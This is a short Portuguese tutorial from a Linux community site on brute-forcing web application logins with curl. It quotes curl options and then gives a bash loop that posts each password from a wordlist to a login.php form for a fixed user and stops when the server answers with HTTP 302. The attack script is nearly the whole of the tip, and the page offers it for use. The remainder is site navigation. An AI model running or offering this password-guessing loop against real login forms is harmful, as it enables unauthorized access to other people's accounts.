cURL - Brute-force em aplicações Web
Publicado por Perfil removido em 01/05/2013
[ Hits: 17.857 ]
Usage: curl [options...] <url> -F/--form <name=content> Specify HTTP multipart POST data (H) -o/--output <file> Write output to <file> instead of stdout -s/--silent Silent mode. Don't output anything -w/--write-out <format> What to output after completionRessaltei essas funções, pois serão necessárias para o ataque de brute-force.

for i in `cat wordlist.txt`
do
login=$(curl -s -o /dev/null -F login=mmxm -F pass=$i -w "%{http_code}" localhost/login.php)
if [ $login '==' "302" ]
then
echo "Password: $i"
break
else
echo "Trying: $i"
fi
done
Pronto, você já estará fazendo um ataque de brute-force através de uma "word list", usando o terminal.
Resolvendo problemas com placas de som no Linux
Instalando o navegador Opera no Ubuntu 20.04 LTS
Instalando Grub Customizer no Ubuntu 22.04
Criando pastas em massa rapidamente no Linux
Applet de Meteorologia no MATE Desktop - Configuração
Alterando as ID tags de seus arquivos de áudio em massa pelo terminal
Minha solução para monitorar múltiplos termômetros no Slackware
Ordenando strings em shell script
Perseidas - Snort + Suricata + ClamAV + Fail2ban
myip - Comando que retorna somente o IP
Nenhum comentário foi encontrado.
Berry Bank: Criando um Banco Digital Gamificado para seus Filhos com Gentoo, Flask e Tailscale
Papagaiando o XFCE com temas e recursos
Recuperando arquivos com o Photorec de discos zoados
Usando o --load-average no Gentoo para evitar OOM Kill
Instalando o COSMIC DE no Gentoo (systemd)
Quando vocês pararam de testar distros? (24)
Ajudante para criar dicas e artigos no VOL (6)
Problemas com o "startx&... no Slackware (13)









